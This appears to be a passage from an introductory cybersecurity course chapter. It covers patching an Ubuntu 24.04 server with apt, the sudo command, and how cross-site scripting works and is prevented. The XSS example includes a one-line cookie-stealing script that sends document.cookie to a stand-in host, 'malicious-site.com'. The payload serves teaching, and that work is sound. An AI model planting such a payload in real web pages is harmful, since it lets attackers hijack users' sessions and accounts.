7  Vulnerabilities and Risks

7.1 Types of Vulnerabilities

7.1.1 Unpatched Software

A software patch is like a tiny piece of fabric used to repair a hole in your clothes. It’s a small fix to a problem. In the same way, a software patch is a small improvement or fix for a computer program. It helps keep your software running smoothly and securely.

If you don’t apply these patches, it’s like leaving a hole in your clothes. Bad things can happen, like getting cold or dirty. Similarly, if you don’t update your software with patches, it can leave your computer vulnerable to hackers who can steal your information or damage your computer.

7.1.2 Upgrade Notification When You Login

Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-39-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Aug  4 22:00:53 UTC 2024

  System load:  0.0               Processes:             100
  Usage of /:   26.2% of 8.65GB   Users logged in:       1
  Memory usage: 41%               IPv4 address for eth0: 64.23.172.30
  Swap usage:   0%                IPv4 address for eth0: 10.48.0.5

Expanded Security Maintenance for Applications is not enabled.

5 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


Last login: Sun Aug  4 21:55:15 2024 from 198.211.111.194
root@cyber24:~#

7.1.2.1 Software Status and Upgrade

Update Package List:

root@cyber24:~# apt update
Hit:1 http://mirrors.digitalocean.com/ubuntu noble InRelease
Get:2 http://mirrors.digitalocean.com/ubuntu noble-updates InRelease [126 kB]                                
Hit:3 http://mirrors.digitalocean.com/ubuntu noble-backports InRelease                                       
Hit:4 https://repos-droplet.digitalocean.com/apt/droplet-agent main InRelease                                
Hit:5 https://repos.insights.digitalocean.com/apt/do-agent main InRelease
Get:6 http://security.ubuntu.com/ubuntu noble-security InRelease [126 kB]
Get:7 http://mirrors.digitalocean.com/ubuntu noble-updates/main amd64 Packages [305 kB]
Get:8 http://mirrors.digitalocean.com/ubuntu noble-updates/main Translation-en [78.7 kB]
Get:9 http://mirrors.digitalocean.com/ubuntu noble-updates/universe amd64 Packages [310 kB]
Get:10 http://mirrors.digitalocean.com/ubuntu noble-updates/universe Translation-en [130 kB]
Get:11 http://security.ubuntu.com/ubuntu noble-security/main amd64 Packages [259 kB]             
Get:12 http://security.ubuntu.com/ubuntu noble-security/universe amd64 Packages [243 kB]
Fetched 1577 kB in 4s (353 kB/s)
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
7 packages can be upgraded. Run 'apt list --upgradable' to see them.

List Upgradable Packages:

root@cyber24:~# apt list --upgradeable
Listing... Done
dracut-install/noble-updates 060+5-1ubuntu3.2 amd64 [upgradable from: 060+5-1ubuntu3.1]
libopeniscsiusr/noble-updates 2.1.9-3ubuntu5.1 amd64 [upgradable from: 2.1.9-3ubuntu4]
libssl3t64/noble-security 3.0.13-0ubuntu3.2 amd64 [upgradable from: 3.0.13-0ubuntu3.1]
needrestart/noble-updates 3.6-7ubuntu4.1 all [upgradable from: 3.6-7ubuntu4]
open-iscsi/noble-updates 2.1.9-3ubuntu5.1 amd64 [upgradable from: 2.1.9-3ubuntu4]
openssl/noble-security 3.0.13-0ubuntu3.2 amd64 [upgradable from: 3.0.13-0ubuntu3.1]
thin-provisioning-tools/noble-updates 0.9.0-2ubuntu5.1 amd64 [upgradable from: 0.9.0-2ubuntu5]

Check Installed Packages with Known Vulnerabilities:

root@cyber24:~# ubuntu-security-status --current
This command has been replaced with 'pro security-status'.
673 packages installed:
    668 packages from Ubuntu Main/Restricted repository
    2 packages from Ubuntu Universe/Multiverse repository
    3 packages from third parties

To get more information about the packages, run
    pro security-status --help
for a list of available options.

Upgrade All Packages:

root@cyber24:~# apt-get upgrade
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Calculating upgrade... Done
The following upgrades have been deferred due to phasing:
  dracut-install libopeniscsiusr needrestart open-iscsi thin-provisioning-tools
The following packages will be upgraded:
  libssl3t64 openssl
2 upgraded, 0 newly installed, 0 to remove and 5 not upgraded.
Need to get 2942 kB of archives.
After this operation, 1024 B of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://security.ubuntu.com/ubuntu noble-security/main amd64 libssl3t64 amd64 3.0.13-0ubuntu3.2 [1940 kB]
Get:2 http://security.ubuntu.com/ubuntu noble-security/main amd64 openssl amd64 3.0.13-0ubuntu3.2 [1002 kB]
Fetched 2942 kB in 8s (389 kB/s)  
(Reading database ... 103540 files and directories currently installed.)
Preparing to unpack .../libssl3t64_3.0.13-0ubuntu3.2_amd64.deb ...
Unpacking libssl3t64:amd64 (3.0.13-0ubuntu3.2) over (3.0.13-0ubuntu3.1) ...
Setting up libssl3t64:amd64 (3.0.13-0ubuntu3.2) ...
(Reading database ... 103540 files and directories currently installed.)
Preparing to unpack .../openssl_3.0.13-0ubuntu3.2_amd64.deb ...
Unpacking openssl (3.0.13-0ubuntu3.2) over (3.0.13-0ubuntu3.1) ...
Setting up openssl (3.0.13-0ubuntu3.2) ...
Processing triggers for man-db (2.12.0-4build2) ...
Processing triggers for libc-bin (2.39-0ubuntu8.2) ...
Scanning processes...                                                                                         
Scanning candidates...                                                                                        
Scanning linux images...                                                                                      

Running kernel seems to be up-to-date.

Restarting services...
 /etc/needrestart/restart.d/systemd-manager
 systemctl restart ssh.service systemd-journald.service systemd-networkd.service systemd-resolved.service systemd-timesyncd.service systemd-udevd.service udisks2.service

Service restarts being deferred:
 systemctl restart systemd-logind.service

No containers need to be restarted.

User sessions running outdated binaries:
 jeremy @ session #264: sshd[25823]
 jeremy @ user manager service: systemd[25827]
 root @ user manager service: systemd[25692]

No VM guests are running outdated hypervisor (qemu) binaries on this host.

Install Security Updates Only:

sudo apt-get upgrade -o Dir::Etc::SourceList=/etc/apt/security.sources.list

Or upgrade automatically

sudo apt-get install unattended-upgrades
sudo unattended-upgrade

Summary

To ensure your Ubuntu 24.04 LTS system is secure and up-to-date, use the ubuntu-security-status command to get a summary of security updates, regularly check for updates with apt, use Canonical Livepatch for kernel updates, subscribe to security notifications, and use tools like Canonical Landscape for managing multiple systems. Regularly applying security updates and staying informed about vulnerabilities are key to maintaining a secure system.

sudo

The sudo command in Ubuntu 24.04 allows users to execute commands with administrative privileges temporarily, which is necessary for performing system tasks like updates. It enhances security by restricting root access to specific commands, thereby preventing accidental system-wide changes. For example, updating the system involves running sudo apt update to refresh the package list and sudo apt upgrade to install available updates. Using sudo ensures that these commands have the necessary permissions while logging the actions for accountability.

A super user (root) needs to add a user to the sudo group before they can use sudo: usermod -aG sudo username

7.1.3 Understanding XSS (Cross-Site Scripting)

7.1.3.1 What is XSS?

XSS stands for Cross-Site Scripting. It is a type of security vulnerability found in web applications that allows attackers to inject malicious scripts into web pages viewed by other users. These scripts can execute in the user’s browser, leading to harmful actions such as stealing sensitive information or altering the website’s content.

7.1.3.2 How XSS Works

  1. Injecting Malicious Scripts: Attackers exploit vulnerabilities in a web application to inject malicious scripts, often through input fields or URLs.

  2. Executing Scripts in the Browser: When users visit the compromised web page, the malicious scripts run in their browsers.

  3. Causing Harm: These scripts can perform actions like stealing cookies or session tokens, redirecting users to phishing sites, or modifying web content.

7.1.3.3 Types of XSS

There are three main types of XSS attacks:

  • Stored XSS (Persistent XSS):
    • Description: The malicious script is stored on the server (e.g., in a database) and is served to users whenever they request the affected page.
    • Example: An attacker submits a comment with a malicious script on a forum. Whenever a user views the comment, the script runs in their browser.
  • Reflected XSS (Non-Persistent XSS):
    • Description: The malicious script is reflected off a web server, typically through URL parameters. It is executed immediately without being stored.
    • Example: An attacker crafts a URL containing a script and tricks users into clicking it. The script runs when the server processes the URL and reflects the input back to the user.
  • DOM-based XSS:
    • Description: The malicious script is executed by modifying the Document Object Model (DOM) of the page directly in the user’s browser, without involving the server.
    • Example: An attacker manipulates the URL hash or other client-side input to execute scripts within the browser’s context.

7.1.3.4 Real-Life Example of XSS

Imagine a popular social media platform where users can post comments on each other’s profiles. The platform has a vulnerability that allows attackers to inject scripts into comment sections because it doesn’t properly validate or sanitise user inputs.

How the Attack Occurs

  1. Attacker Identifies the Vulnerability: A malicious user discovers that they can inject JavaScript code into the comment section of the social media site.

  2. Injecting Malicious Script: The attacker crafts a comment containing a script that looks harmless at first glance:

    <script>
    document.location='http://malicious-site.com/steal?cookie='+document.cookie
</script>

    This script captures the cookies of anyone who views the comment and sends them to a server controlled by the attacker.

  3. Posting the Comment: The attacker posts this comment on the profile of a high-profile user, knowing it will be viewed by many others.

  4. Users View the Compromised Page: When other users visit the profile and the malicious comment loads, the script executes in their browsers.

  5. Stealing Session Cookies: The script sends their session cookies to the attacker’s server. With these cookies, the attacker can impersonate users and access their accounts without knowing their passwords.

7.1.3.5 Impact of XSS Attacks

7.1.3.6 Impact

  • Account Hijacking: The attacker can access and manipulate user accounts, post unauthorized content, or steal personal information.
  • Spread of Malicious Content: The attacker could use the compromised accounts to spread more malicious links, amplifying the attack’s reach.
  • Trust Damage: Users lose trust in the platform’s security, affecting its reputation and user base.

7.1.3.7 Preventing XSS

To protect web applications from XSS attacks, developers should:

  • Validate and Sanitize Inputs: Ensure all user inputs are checked for harmful characters and remove or escape them.
  • Encode Output: Safely encode data before displaying it in the browser to prevent execution of injected scripts.
  • Use Security Libraries: Utilize frameworks and libraries that offer built-in protection against XSS.
  • Implement Content Security Policy (CSP): Set up a CSP to control which scripts can run on your site.

7.1.3.8 Conclusion

XSS is a serious vulnerability that can have damaging effects on both users and websites. By understanding how XSS attacks work and applying security best practices, developers can protect their applications and users from these threats.

7.1.4 Insider threats